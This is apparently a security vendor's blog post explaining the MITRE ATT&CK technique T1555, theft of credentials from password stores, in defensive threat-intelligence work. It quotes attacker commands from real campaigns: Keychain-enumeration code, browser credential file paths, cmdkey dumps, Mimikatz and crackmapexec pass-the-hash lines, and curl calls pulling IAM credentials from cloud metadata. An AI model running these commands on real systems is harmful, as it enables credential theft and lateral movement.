Free Trial
|
Login
Free Trial
Login
Platform
Platform
I want to
report
WHITEPAPER Picus Red Report 2025
white paper
DATASHEET Security Validation Platform
Use Cases
Use Cases
Frameworks
Group
WHITEPAPER Building a Robust Defense-in-Depth Strategy with Breach and Attack Simulation (BAS)
Paper Icons
E-BOOK An Introduction to Exposure Validation
Research
RESEARCH
LEARNING
whitepaper
Whitepaper Modernize Your SOC with Breach and Attack Simulation
report (1)
REPORT Blue Report: Effective Threat Exposure Management
Resources
RESOURCES
LEARNING
Group
WHITEPAPER Double Your Threat Blocking in 90 Days
Paper Icons
E-BOOK An Introduction to Exposure Validation
Company
COMPANY
PARTNERS
webinar
REGISTER NOW: Assessing Your Zero Trust Program with "Assume Breach" Mindset
Data sheet
DATASHEET The Pioneer of Breach & Attack Simulation
GET A DEMO

MITRE ATT&CK T1555 Credentials from Password Stores

Huseyin Can YUCEEL | February 10, 2025

The Red Report 2025

The 10 Most Prevalent MITRE ATT&CK Techniques Used by Adversaries.

DOWNLOAD

Passwords are the keys to the kingdom in any environment and modern security best practices tell us to use more complex passwords. While these practices aimed to improve security, they also made passwords harder to remember, leading many users to store them in password managers and browser credential stores for convenience. Password stores often contain plaintext or encrypted credentials that, if compromised, can provide attackers with unauthorized access to critical systems.

In this blog post, we explain the T1555 Credentials from Password Stores technique of the MITRE ATT&CK® framework and explore how adversaries exploit password stores with real-world attack examples in detail.

rr25-mockup1

 

  

The Red Report 2025
The 10 Most Prevalent MITRE ATT&CK Techniques Used by Adversaries

GET THE REPORT

Adversary Use of Credentials from Password Stores

Adversaries use Credentials from Password Stores technique to harvest credentials stored in security repositories, enabling them to expand their access within a target environment. Since password stores often contain sensitive information, such as account credentials for enterprise systems, cloud services, and critical applications, they are particularly attractive to attackers. Compromised password stores can grant adversaries elevated privileges, making it easier to maintain persistence, move laterally across networks, and access valuable data.

This technique often requires attackers to gain access to the device or application hosting the password store. The initial access can be achieved via Phishing (T1566) or Exploiting Public Facing Applications (T1190). Once inside, attackers leverage various tactics, including abusing administrative privileges or exploiting weaknesses in the password store's design, to decrypt or directly extract the stored credentials. For example, password managers and browser-based storage often rely on encryption to secure stored data, but if the adversary can access the master key or exploit a design flaw, the encrypted sensitive data becomes exposed.

By obtaining the stored credentials, adversaries can bypass other security controls such as multi-factor authentication (MFA), access sensitive data, or impersonate legitimate users. Additionally, credentials extracted from password stores often include details for privileged accounts or service accounts, which are particularly valuable for expanding an attack's scope or achieving complete domain compromise.

  • Privilege Escalation

By extracting credentials stored in password repositories, attackers may gain access to accounts with higher privileges than their initial foothold, enabling them to execute actions or access systems that would otherwise be restricted. For instance, many users and applications store administrator or service account credentials in password managers, browser-based storage, or operating system keychains. If an adversary compromises a machine or application and extracts these stored credentials, they could use them to log into accounts with elevated privileges, such as domain administrators, system administrators, or privileged cloud service accounts. This access allows the attacker to bypass privilege constraints on their initial account, significantly increasing their control over the environment.

  • Lateral Movement

Lateral movement involves an attacker expanding their access across systems and networks after gaining an initial foothold. Extracting credentials from password stores is a particularly effective method for this purpose, as it often provides the attacker with legitimate authentication data for other accounts, systems, or applications. For example, credentials for remote desktop connections, VPNs, or privileged accounts might be stored in these repositories. By using these credentials, attackers can authenticate to other systems within the network as legitimate users, bypassing many security mechanisms that might block unauthorized access.

Additionally, the credentials extracted may belong to users with access to critical or interconnected systems, such as file shares, email servers, or administrative consoles. By leveraging these credentials, adversaries can pivot through the network, establishing persistence and identifying additional targets for exploitation.

  • Defense Evasion 

With extracted credentials, adversaries can impersonate legitimate users to access systems, applications, or resources. Compromised users' actions may appear normal to security monitoring systems, reducing the likelihood of triggering alerts. For example, logging into a system with the rightful user's credentials often bypasses authentication-based controls, including multi-factor authentication (MFA), if the extracted credentials include tokens or session information.

Moreover, adversaries can use credentials to avoid detection tools that monitor unauthorized execution or privilege escalation attempts. Instead of deploying malware or using exploit-based methods, which may trigger antivirus or endpoint detection systems, attackers with extracted credentials can perform their tasks directly through authorized accounts and approved tools. This strategy minimizes their reliance on potentially detectable malicious tools or techniques.

  • Persistence

By extracting stored credentials, adversaries can gain access to accounts that enable them to re-enter the target environment at will. These credentials might belong to privileged users, service accounts, or cloud-based applications, providing attackers with multiple avenues for maintaining access. For instance, if an attacker retrieves the credentials of an administrator or a system account, they can use these to log back into the environment remotely, create backdoor accounts, or modify configurations to secure their foothold.

Moreover, the use of legitimate credentials for persistence is particularly advantageous for adversaries because it allows them to blend their activity with normal user behavior. Unlike malware-based persistence methods, which rely on implanting additional code or creating suspicious registry entries, using credentials appears less anomalous to security monitoring tools. This makes detection more challenging and allows attackers to operate covertly.

Sub-techniques of Credentials from Password Stores

  • T1555.001 Keychain

Keychain is a built-in password management system for macOS and iOS that securely stores users' sensitive information, such as usernames, passwords, encryption keys, certificates, and secure notes. Its purpose is to provide a convenient and secure way for users and applications to manage authentication data. 

Keychain is designed to streamline the user experience by autofilling credentials across various applications and websites, ensuring that authentication processes are both seamless and secure. It employs robust encryption mechanisms to protect stored data, making it accessible only to authorized users and applications.

Despite its robust design, Keychain is not entirely immune to vulnerabilities. Misconfigurations, exploitable flaws in the system, or adversaries gaining unauthorized access to the user's device can potentially compromise the sensitive information stored within it. 

Adversaries target the Keychain because it often contains valuable credentials for both local and remote systems, such as email accounts, VPNs, and websites. To access the Keychain, attackers typically need to gain sufficient privileges, such as root access or control over the user's account. Once they have access, they may use legitimate or malicious tools to extract the stored credentials. If they can bypass or manipulate the system's access controls, they can potentially decrypt and view sensitive information stored within.

A particularly stealthy aspect of targeting the Keychain is its integration with macOS and iOS as a legitimate system tool. Since Keychain operations are native to the operating system, unauthorized data extraction might not trigger immediate alerts from security monitoring systems. Attackers can exploit this design to blend their actions with legitimate user or system activity, making detection challenging for defenders.

For example, adversaries may utilize macOS's built-in security command-line tool, which allows authorized users to query Keychain data. By leveraging this tool, attackers can programmatically extract credentials without deploying malicious software that might be flagged by antivirus or endpoint detection systems. Custom scripts or malicious applications can automate these queries, enabling attackers to extract and decrypt multiple credentials at once, provided they bypass access controls or supply the appropriate Keychain password.

In April 2024, Cuckoo infostealer malware was reported to steal data from the compromised users' Keychain directory using the code snippet given below [1].

_snprintf(&_~/Library/Keychains, 0x200, "%s/%s/%s")

osascriptCreateforApple()

void* var_4b0 = &var_458

int64_t* var_4a8_2 = &Keychains

_snprintf(&_~/Library/Keychains, 0x200, "%s/%s")

int64_t* var_498 = &Keychains

void* var_490 = &_~/Library/Keychains

openDir_readDir(DirectoryOpen: &_~/Library/Keychains, "*", avoid_DS_Store, &var_498, 0x3e7)

  • T1555.002 Securityd Memory

Securityd memory is the portion of system memory allocated to the securityd process, a core component of macOS responsible for managing sensitive security operations. This process is central to handling Keychain interactions, enforcing access controls, and performing cryptographic tasks. As part of its operations, securityd temporarily stores data in memory to facilitate tasks such as verifying credentials, retrieving Keychain entries, or executing encryption and decryption processes.

The data stored in securityd memory often includes highly sensitive information, such as plaintext passwords, private keys, authentication tokens, and other cryptographic materials. While this data is typically encrypted when stored in the Keychain, it must be decrypted and held in memory to perform operations. This decrypted state makes securityd memory a prime target for attackers seeking to harvest credentials or cryptographic keys.

Adversaries target securityd memory to extract sensitive credentials and cryptographic materials. Securityd memory temporarily holds plaintext versions of sensitive credentials, such as usernames, passwords, private keys, and authentication tokens, while performing tasks like user authentication or cryptographic operations. By exploiting securityd memory, attackers can bypass the typical security protections surrounding Keychain data, such as encryption and access controls, and directly access sensitive information in its decrypted state.

Since securityd memory is located in the protected memory regions of the operating system, adversaries need to gain root or administrator privileges to interact with it. Once the necessary privileges are obtained, attackers use tools or custom scripts to inspect and extract sensitive data stored temporarily in the memory of the securityd process. Adversaries typically use memory dumping tools, such as gcore, to capture the memory space of the securityd process. They can then analyze the captured memory dump to locate sensitive credentials or cryptographic keys and extract credentials.

The extracted credentials and cryptographic materials can be used for various malicious activities, such as escalating privileges, authenticating to secure systems, performing lateral movement within a network, or exfiltrating sensitive data. Because the credentials are retrieved in plaintext, they are immediately usable by the attacker, significantly enhancing the speed and effectiveness of the attack.

  • T1555.003 Credential from Web Browsers

Many modern web browsers offer built-in password managers to improve usability and streamline the login process for users. When users log into a website, the browser can offer to save their username and password for future use. When a user opts to save a password, the browser encrypts the credentials using a mechanism tied to the user's system credentials or a master key. 

Internally, browsers use secure storage mechanisms to keep track of saved credentials. For instance, in Chrome, passwords are stored in an encrypted database file, often located in the user's profile directory. This file cannot be decrypted without access to the user's operating system-level credentials or, in some cases, a logged-in browser profile tied to a cloud service. Similarly, Firefox uses an encrypted database called logins.json along with a key4.db file to manage stored passwords, with encryption tied to the user's master password if set.

When a user revisits a website where credentials are saved, the browser retrieves and decrypts the relevant username and password, automatically populating the login fields. This process happens seamlessly in the background, with the decryption step requiring the user to be authenticated to their device or browser profile.

Adversaries extract saved usernames and passwords from web browsers, exploiting their credential storage mechanisms. The extracted credentials may provide a direct pathway to both personal and enterprise accounts, making them an appealing target for adversaries. 

This technique typically requires adversaries to have an initial foothold in the target system. Once on the system, attackers target the files, databases, or APIs associated with the browser's password storage. For instance, Google Chrome and Microsoft Edge store credentials in an encrypted SQLite database within the user's profile directory. The encryption keys for these databases are often tied to the operating system's secure storage mechanism, such as the Windows Data Protection API (DPAPI) or the macOS Keychain. If an attacker gains administrative privileges, they can extract the database and decrypt it using tools or scripts that leverage these keys. Similarly, Mozilla Firefox stores credentials in a logins.json file, encrypted with a key stored locally, which attackers can retrieve to decrypt the file and extract passwords.

In February 2024, CISA reported that the Chinese APT Volt Typhoon group targets Google Chrome and Microsoft Edge for stored credentials and browser history [2]. Adversaries look for sensitive data in the folders listed below and extract a Local State file that contains the AES encryption key used to encrypt passwords stored in the browser.

AppData\local\Google\Chrome\UserData\default\History

AppData\Local\Google\Chrome\User Data\Local State

AppData\Local\Google\Chrome\User Data\Default\Login Data

AppData\Local\Microsoft\Edge\User Data

  • T1555.004 Windows Credential Manager

Windows Credential Manager is a built-in feature in Microsoft Windows that allows users to securely store and manage credentials, such as usernames, passwords, and authentication tokens. It is designed to streamline the user experience by automatically saving and retrieving credentials for websites, network shares, and other resources, eliminating the need for users to remember multiple passwords. This functionality is integrated into the Windows operating system and is accessible through the Control Panel or settings.

The credential manager acts as a secure repository for sensitive data. When a user logs into a website or connects to a network resource, Windows offers to save the login credentials. These credentials are then encrypted and stored locally on the system. Windows uses its Data Protection API (DPAPI) to encrypt this information, tying the encryption keys to the user's account. This ensures that only the authenticated user can access the stored credentials, providing a layer of security against unauthorized access.

There are two primary types of credentials stored in Windows Credential Manager: Web Credentials and Windows Credentials. Web Credentials are used for internet-related logins, such as websites and web-based applications, while Windows Credential Manager stores authentication data for network shares, mapped drives, and enterprise applications. The manager also supports certificates and generic credentials, which can be used by custom applications.

Adversaries target the Windows Credential Manager to extract sensitive authentication data. While Credential Manager is designed to enhance usability and security, it has become a target for attackers seeking to harvest stored credentials for unauthorized access and further malicious activities.

Similar to other credential access techniques, adversaries typically begin by gaining access to the target system. This can be achieved through phishing attacks, malware delivery, exploiting vulnerabilities, or other initial access vectors. Once on the system, attackers aim to escalate their privileges to gain administrative rights or gain access to the specific user account whose credentials they intend to extract. Elevated privileges are often necessary because Credential Manager encrypts stored data and restricts access based on the user's authentication context. With the required privileges, adversaries can extract credentials using various methods and tools. 

One common approach is to use legitimate Windows commands or PowerShell scripts to interact with Credential Manager. For example, attackers can use commands like cmdkey to list stored credentials or manipulate Credential Manager entries. In December 2024, DarkGate malware was reported to use cmdkey.exe to view, extract and delete saved credentials stored in the Windows Credential Manager [3].

cmdkey /delete

cmdkey /list > C:\temp\cred.txt

Another prevalent tool is Mimikatz, a post-exploitation framework capable of dumping plaintext credentials from memory or extracting encrypted credentials from storage. In August 2024, Slow Tempest APT group was reported to use Mimikatz for dumping NTLM hashes [4]. Adversaries can crack these hashes to obtain cleartext credentials or use them in Pass-the-Hash attacks for lateral movement. In this example, Slow Tempest used the extracted NTLM hashes for Pass-the-Hash attack using Mimikatz, crackmapexec, and psexec.

sekurlsa::pth /user:[REDACTED] /domain:[REDACTED] /ntlm:[REDACTED] "/run:mstsc.exe /restrictedadmin"

crackmapexec smb ip.txt -u [REDACTED_DOMAIN]/Administrator -H [REDACTED_HASH]

python3 psexec.py [REDACTED_USER]@[REDACTED_IP] -hashes [REDACTED_HASH] -codec gbk

  • T1555.005 Password Managers

Password managers are software applications designed to securely store, generate, and manage passwords for a user's online accounts and services. Their primary purpose is to help individuals and organizations maintain strong, unique passwords for every account without the burden of memorizing them all. 

In an age where digital security is paramount, password managers play a critical role in protecting against cyber threats like password breaches, credential stuffing, and account takeovers.

A password manager functions as a centralized vault that stores encrypted passwords and other sensitive information, such as security questions, payment card details, and secure notes. The stored data is accessible through a single master password or, in some cases, biometric authentication, such as a fingerprint or facial recognition. This master password serves as the key to decrypt the stored information, making it essential to create and protect a strong, unique master password.

Password managers have become high-value targets for attackers because they often contain a wealth of sensitive credentials that can provide access to numerous accounts and systems. Adversaries aim to compromise password managers to extract valid credentials that can be used to access sensitive data, elevate privileges, and compromise other systems in the victim's environment.

The security of a password manager depends on its encryption mechanism and the strength of its master password. Adversaries may attempt to extract the encrypted vault file or database associated with the password manager. If they successfully obtain this file, they can try offline attacks, such as brute force or dictionary attacks, to crack the master password and decrypt the stored data. Tools like Hashcat can be used for such operations, especially if the master password is weak or commonly used.

In some cases, attackers leverage malware or keyloggers to capture the master password when the user enters it. This is a direct method of bypassing encryption without the need for extensive computational efforts. 

In August 2024, ACR Stealer was reported to target password managers such as 1Password, RoboFrom, Bitwarden, and NordPass [5]. 

  • T1555.006 Cloud Secrets Management Stores

Cloud Secrets Management Stores are specialized services provided by cloud platforms or third-party vendors to securely manage, store, and access sensitive information such as API keys, encryption keys, passwords, certificates, and other credentials. These secrets are critical for enabling secure communication between applications, services, and infrastructure in modern, cloud-centric environments.

Secrets management stores reduce risks of exposing sensitive information by replacing hardcoded secrets with a centralized, secure repository. They encrypt and control access to secrets, ensuring only authorized users or applications can retrieve them. Services like AWS Secrets Manager, Azure Key Vault, and Google Cloud Secret Manager offer features such as fine-grained access control, auditing, versioning, and automated secret rotation.

Adversaries exploit cloud-based secrets management systems post-compromise to access sensitive data or escalate privileges. They target misconfigurations, such as overly permissive access controls, often caused by developers assigning broad permissions. Using legitimate tools like AWS CLI, Azure PowerShell, or gcloud, attackers query APIs with stolen credentials to retrieve secrets, blending in with normal activity unless closely monitored.

Adversaries exploit exposed credentials or tokens found in source code repositories, logs, or configuration files. Developers may unintentionally embed access tokens or API keys in code, which attackers can harvest if leaked. Malware or keyloggers may also be used to capture credentials directly from endpoints. In the SCARLETELL operation, adversaries exploited the Instance Metadata Service Version 1 (IMDSv1) to extract the credentials of the node role using the script given below [6]. 

TOKEN= 'curl -X PUT "http://<target_IP>/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600"' && \

ANAME= 'curl -H "X-aws-ec2-metadata-token: $TOKEN" -v
http://<target_IP>/latest/meta-data/iam/security-credentials/' && \

curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://<target_IP>/latest/meta-data/iam/security-credentials/$ANAME >> /tmp/...b

References

[1] A. Kohler and C. Lopez, "Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware,". Available: https://www.kandji.io/blog/malware-cuckoo-infostealer-spyware.

[2] “Website." Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

[3] T. McGraw, “Black Basta Ransomware Campaign Drops Zbot, DarkGate, & Custom Malware," Rapid7. https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/.

[4] “From Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users," Securonix, Aug. 29, 2024. Available: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/.

[5] C. Lin, “Exploiting CVE-2024-21412: A Stealer Campaign Unleashed," Fortinet Blog. https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed

[6] A. Brucato, “SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto," Sysdig, https://sysdig.com/blog/scarleteel-2-0/
Emerging Threat Palo Alto CVE-2024-0012 and CVE-2024-9474 Vulnerabilities Explained
Learn More
Emerging Threat Understanding and Mitigating Midnight Blizzard's RDP-Based Spear Phishing Campaign
Learn More
fortimanager
Emerging Threat CVE-2024-47575: FortiManager Missing Authentication Zero-Day Vulnerability Explained
Learn More
cisa-alert-aa24-290a
Emerging Threat Iranian Cyber Actors’ Brute Force and Credential Access Attacks: CISA Alert AA24-290A
Learn More
Emerging Threat CISA Alert AA24-249A: Russian GRU Unit 29155 Targeting U.S. and Global Critical Infrastructure
Learn More
emerging-threat
Emerging Threat CVE-2024-38063: Remote Kernel Exploitation via IPv6 in Windows
Learn More
RansomHub-Ransomware
Emerging Threat RansomHub Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA24-242A
Learn More
pioneer-kitten-ransomware
Emerging Threat Pioneer Kitten: Iranian Threat Actors Facilitate Ransomware Attacks Against U.S. Organizations
Learn More
north-korean-APT-group
Emerging Threat Andariel: North Korean APT Group Targets Military and Nuclear Programs
Learn More